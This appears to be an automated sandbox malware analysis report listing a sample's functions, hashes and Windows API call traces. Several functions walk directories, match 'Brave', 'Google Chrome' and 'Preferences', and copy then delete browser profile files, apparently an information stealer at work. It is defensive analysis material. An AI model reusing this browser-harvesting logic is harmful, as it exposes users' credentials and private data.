                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitGlobalMemoryProcessStatus
                                    • String ID: @
                                    • API String ID: 803317263-2766056989
                                    • Opcode ID: 0af822dec8986b3841515488a1175ed69c7a71417f84196ea66a8d9d3ce6e341
                                    • Instruction ID: f30d9152dfb2305c053f1a236b741c8201a730669e2da9f7b2abd7d359cb6700
                                    • Opcode Fuzzy Hash: 0af822dec8986b3841515488a1175ed69c7a71417f84196ea66a8d9d3ce6e341
                                    • Instruction Fuzzy Hash: 35F082B09182485BFB246A64984B729F7DCFB02364F184A29DEAAC2191E670C840A267
                                    Function 00F78C88 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 2895 f78c88-f78cc4 StrCmpCA 2897 f78cc6-f78cc7 ExitProcess 2895->2897 2898 f78ccd-f78ce6 2895->2898 2900 f78ee2-f78eef call f62a20 2898->2900 2901 f78cec-f78cf1 2898->2901 2903 f78cf6-f78cf9 2901->2903 2904 f78ec3-f78edc 2903->2904 2905 f78cff 2903->2905 2904->2900 2939 f78cf3 2904->2939 2907 f78e56-f78e64 StrCmpCA 2905->2907 2908 f78d30-f78d3f lstrlen 2905->2908 2909 f78dbd-f78dcb StrCmpCA 2905->2909 2910 f78ddd-f78deb StrCmpCA 2905->2910 2911 f78dfd-f78e0b StrCmpCA 2905->2911 2912 f78e1d-f78e2b StrCmpCA 2905->2912 2913 f78e3d-f78e4b StrCmpCA 2905->2913 2914 f78d5a-f78d69 lstrlen 2905->2914 2915 f78d06-f78d15 lstrlen 2905->2915 2916 f78d84-f78d92 StrCmpCA 2905->2916 2917 f78da4-f78db8 StrCmpCA 2905->2917 2918 f78e6f-f78e7d StrCmpCA 2905->2918 2919 f78e88-f78e9a lstrlen 2905->2919 2907->2904 2931 f78e66-f78e6d 2907->2931 2935 f78d41-f78d46 call f62a20 2908->2935 2936 f78d49-f78d55 call f62930 2908->2936 2909->2904 2924 f78dd1-f78dd8 2909->2924 2910->2904 2925 f78df1-f78df8 2910->2925 2911->2904 2926 f78e11-f78e18 2911->2926 2912->2904 2927 f78e31-f78e38 2912->2927 2913->2904 2928 f78e4d-f78e54 2913->2928 2920 f78d73-f78d7f call f62930 2914->2920 2921 f78d6b-f78d70 call f62a20 2914->2921 2929 f78d17-f78d1c call f62a20 2915->2929 2930 f78d1f-f78d2b call f62930 2915->2930 2916->2904 2923 f78d98-f78d9f 2916->2923 2917->2904 2918->2904 2932 f78e7f-f78e86 2918->2932 2933 f78ea4-f78eb0 call f62930 2919->2933 2934 f78e9c-f78ea1 call f62a20 2919->2934 2954 f78eb3-f78eb5 2920->2954 2921->2920 2923->2904 2924->2904 2925->2904 2926->2904 2927->2904 2928->2904 2929->2930 2930->2954 2931->2904 2932->2904 2933->2954 2934->2933 2935->2936 2936->2954 2939->2903 2954->2904 2955 f78eb7-f78eb9 2954->2955 2955->2904 2956 f78ebb-f78ebd lstrcpy 2955->2956 2956->2904
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID: block
                                    • API String ID: 621844428-2199623458
                                    • Opcode ID: 3179570e506e0fc87b80f251f9b4f99531a16d2a6c0cc07b604fe68705ac4ef2
                                    • Instruction ID: 68fbca5cc96f1655dff82f539b816a8c92cdb662603d79ff5dec740ede065090
                                    • Opcode Fuzzy Hash: 3179570e506e0fc87b80f251f9b4f99531a16d2a6c0cc07b604fe68705ac4ef2
                                    • Instruction Fuzzy Hash: 66E0C026904348BBCB3457B88C7CCC77FACCF40204B060069FA685BA00D430DC01C3A6

                                    Non-executed Functions

                                    Function 00F72390 Relevance: 223.6, APIs: 126, Strings: 1, Instructions: 1308stringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F723D4
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F723F7
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F72402
                                    • lstrlen.KERNEL32(\*.*), ref: 00F7240D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7242A
                                    • lstrcat.KERNEL32(00000000,\*.*), ref: 00F72436
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F7246A
                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 00F72486
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                    • String ID: \*.*
                                    • API String ID: 2567437900-1173974218
                                    • Opcode ID: 95399509001528181cd7f351beab1ae4b1f98fdfd7a75e683f91d3668874ee6a
                                    • Instruction ID: a29d3737b7a8158d0f2aa230909007ea25881eafb17074a1aceeb4de4fa02f10
                                    • Opcode Fuzzy Hash: 95399509001528181cd7f351beab1ae4b1f98fdfd7a75e683f91d3668874ee6a
                                    • Instruction Fuzzy Hash: 21A2C671D0161A9BDB71AFB4CD89AAE77B8BF44314F088039F829D7205DB38DD41AB52
                                    Function 00F616A0 Relevance: 202.4, APIs: 114, Strings: 1, Instructions: 1164stringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F616E2
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F61719
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6176C
                                    • lstrcat.KERNEL32(00000000), ref: 00F61776
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F617A2
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F617EF
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F617F9
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F61825
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F61875
                                    • lstrcat.KERNEL32(00000000), ref: 00F6187F
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F618AB
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F618F3
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F618FE
                                    • lstrlen.KERNEL32(00F91794), ref: 00F61909
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F61929
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F61935
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6195B
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F61966
                                    • lstrlen.KERNEL32(\*.*), ref: 00F61971
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6198E
                                    • lstrcat.KERNEL32(00000000,\*.*), ref: 00F6199A
                                      • Part of subcall function 00F84040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 00F8406D
                                      • Part of subcall function 00F84040: lstrcpy.KERNEL32(00000000,?), ref: 00F840A2
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F619C3
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F61A0E
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F61A16
                                    • lstrlen.KERNEL32(00F91794), ref: 00F61A21
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F61A41
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F61A4D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F61A76
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F61A81
                                    • lstrlen.KERNEL32(00F91794), ref: 00F61A8C
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F61AAC
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F61AB8
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F61ADE
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F61AE9
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F61B11
                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 00F61B45
                                    • StrCmpCA.SHLWAPI(?,00F917A0), ref: 00F61B70
                                    • StrCmpCA.SHLWAPI(?,00F917A4), ref: 00F61B8A
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F61BC4
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F61BFB
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F61C03
                                    • lstrlen.KERNEL32(00F91794), ref: 00F61C0E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F61C31
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F61C3D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F61C69
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F61C74
                                    • lstrlen.KERNEL32(00F91794), ref: 00F61C7F
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F61CA2
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F61CAE
                                    • lstrlen.KERNEL32(?), ref: 00F61CBB
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F61CDB
                                    • lstrcat.KERNEL32(00000000,?), ref: 00F61CE9
                                    • lstrlen.KERNEL32(00F91794), ref: 00F61CF4
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F61D14
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F61D20
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F61D46
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F61D51
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F61D7D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F61DE0
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F61DEB
                                    • lstrlen.KERNEL32(00F91794), ref: 00F61DF6
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F61E19
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F61E25
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F61E4B
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F61E56
                                    • lstrlen.KERNEL32(00F91794), ref: 00F61E61
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F61E81
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F61E8D
                                    • lstrlen.KERNEL32(?), ref: 00F61E9A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F61EBA
                                    • lstrcat.KERNEL32(00000000,?), ref: 00F61EC8
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F61EF4
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F61F3E
                                    • GetFileAttributesA.KERNEL32(00000000), ref: 00F61F45
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F61F9F
                                    • lstrlen.KERNEL32(00A99108), ref: 00F61FAE
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F61FDB
                                    • lstrcat.KERNEL32(00000000,?), ref: 00F61FE3
                                    • lstrlen.KERNEL32(00F91794), ref: 00F61FEE
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6200E
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F6201A
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F62042
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F6204D
                                    • lstrlen.KERNEL32(00F91794), ref: 00F62058
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F62075
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F62081
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                                    • String ID: \*.*
                                    • API String ID: 4127656590-1173974218
                                    • Opcode ID: eccc622fff241ec128d229285526fb22cb1c697ef9936855a2fc38562e1aacc0
                                    • Instruction ID: 0f5bbd1cddfc4fd9a2d42bcb0bd587309b74339a852770a6eb51d981d84250ae
                                    • Opcode Fuzzy Hash: eccc622fff241ec128d229285526fb22cb1c697ef9936855a2fc38562e1aacc0
                                    • Instruction Fuzzy Hash: A592C371D0161A9BDB71EFA4DD89AAE77B9BF44314F080038F825A7205DB38DD41EBA1
                                    Function 00F6DB80 Relevance: 176.2, APIs: 96, Strings: 4, Instructions: 1193stringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F6DBC1
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6DBE4
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F6DBEF
                                    • lstrlen.KERNEL32(00F94CA8), ref: 00F6DBFA
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6DC17
                                    • lstrcat.KERNEL32(00000000,00F94CA8), ref: 00F6DC23
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6DC4C
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F6DC8F
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F6DCBF
                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 00F6DCD0
                                    • StrCmpCA.SHLWAPI(?,00F917A0), ref: 00F6DCF0
                                    • StrCmpCA.SHLWAPI(?,00F917A4), ref: 00F6DD0A
                                    • lstrlen.KERNEL32(00F8CFEC), ref: 00F6DD1D
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F6DD47
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6DD70
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F6DD7B
                                    • lstrlen.KERNEL32(00F91794), ref: 00F6DD86
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6DDA3
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F6DDAF
                                    • lstrlen.KERNEL32(?), ref: 00F6DDBC
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6DDDF
                                    • lstrcat.KERNEL32(00000000,?), ref: 00F6DDED
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6DE19
                                    • lstrlen.KERNEL32(00F91794), ref: 00F6DE3D
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F6DE6F
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F6DE7B
                                    • lstrlen.KERNEL32(00A98F68), ref: 00F6DE8A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6DEB0
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F6DEBB
                                    • lstrlen.KERNEL32(00F91794), ref: 00F6DEC6
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F6DEE6
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F6DEF2
                                    • lstrlen.KERNEL32(00A991B8), ref: 00F6DF01
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6DF27
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F6DF32
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6DF5E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6DFA5
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F6DFB1
                                    • lstrlen.KERNEL32(00A98F68), ref: 00F6DFC0
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6DFE9
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F6DFF4
                                    • lstrlen.KERNEL32(00F91794), ref: 00F6DFFF
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F6E022
                                    • lstrcat.KERNEL32(00000000,00F91794), ref: 00F6E02E
                                    • lstrlen.KERNEL32(00A991B8), ref: 00F6E03D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6E063
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00F6E06E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6E09A
                                    • StrCmpCA.SHLWAPI(?,Brave), ref: 00F6E0CD
                                    • StrCmpCA.SHLWAPI(?,Preferences), ref: 00F6E0E7
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F6E11F
                                    • lstrlen.KERNEL32(00A9CF08), ref: 00F6E12E
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F6E155
                                    • lstrcat.KERNEL32(00000000,?), ref: 00F6E15D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6E19F
                                    • lstrcat.KERNEL32(00000000), ref: 00F6E1A9
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6E1D0
                                    • CopyFileA.KERNEL32(00000000,?,00000001), ref: 00F6E1F9
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F6E22F
                                    • lstrlen.KERNEL32(00A99108), ref: 00F6E23D
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F6E261
                                    • lstrcat.KERNEL32(00000000,00A99108), ref: 00F6E269
                                    • lstrlen.KERNEL32(\Brave\Preferences), ref: 00F6E274
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6E29B
                                    • lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 00F6E2A7
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6E2CF
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F6E30F
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6E349
                                    • DeleteFileA.KERNEL32(?), ref: 00F6E381
                                    • StrCmpCA.SHLWAPI(?,00A9D1D8), ref: 00F6E3AB
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F6E3F4
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6E41C
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F6E445
                                    • StrCmpCA.SHLWAPI(?,00A991B8), ref: 00F6E468
                                    • StrCmpCA.SHLWAPI(?,00A98F68), ref: 00F6E47D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6E4D9
                                    • GetFileAttributesA.KERNEL32(00000000), ref: 00F6E4E0
                                    • StrCmpCA.SHLWAPI(?,00A9D118), ref: 00F6E58E
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F6E5C4
                                    • CopyFileA.KERNEL32(00000000,?,00000001), ref: 00F6E639
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F6E678
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F6E6A1
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F6E6C7
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F6E70E
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F6E737
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F6E75C
                                    • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 00F6E776
                                    • DeleteFileA.KERNEL32(?), ref: 00F6E7D2
                                    • StrCmpCA.SHLWAPI(?,00A99168), ref: 00F6E7FC
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F6E88C
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F6E8B5
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F6E8EE
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F6E916
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F6E952
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1738932655.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                    • Associated: 00000000.00000002.1738918094.0000000000F60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000000FF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.000000000100F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1738932655.0000000001198000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739104230.00000000011AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.00000000011AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001335000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.000000000143E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001448000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739118707.0000000001455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739467945.0000000001456000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739584107.00000000015F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1739601018.00000000015F7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$lstrlen$File$CopyDelete$AttributesFindFirst
                                    • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                    • API String ID: 2635522530-726946144
                                    • Opcode ID: e17171493be007febaffda059b389ff8ee962de18eedfde87810657cb7286df6
                                    • Instruction ID: 66037105ab1233c5931ac438aedf915f5009172258301ba4d3d42291efe8f5ce
                                    • Opcode Fuzzy Hash: e17171493be007febaffda059b389ff8ee962de18eedfde87810657cb7286df6
                                    • Instruction Fuzzy Hash: E092A171E1160A9BCB24EFB4DC89AAE77B9BF44314F084528F826D7245DB38DC45EB90
                                    Function 00F718A0 Relevance: 156.7, APIs: 88, Strings: 1, Instructions: 909stringfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F718D2
                                    • lstrlen.KERNEL32(\*.*), ref: 00F718DD
                                    • lstrcpy.KERNEL32(00000000,?), ref: 00F718FF
                                    • lstrcat.KERNEL32(00000000,\*.*), ref: 00F7190B
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00F71932
                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 00F71947
                                    • StrCmpCA.SHLWAPI(?,00F917A0), ref: 00F71967
                                    • StrCmpCA.SHLWAPI(?,00F917A4), ref: 00F71981
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F719BF
                                    • lstrcpy.KERNEL32(00000000,00F8CFEC), ref: 00F719F2
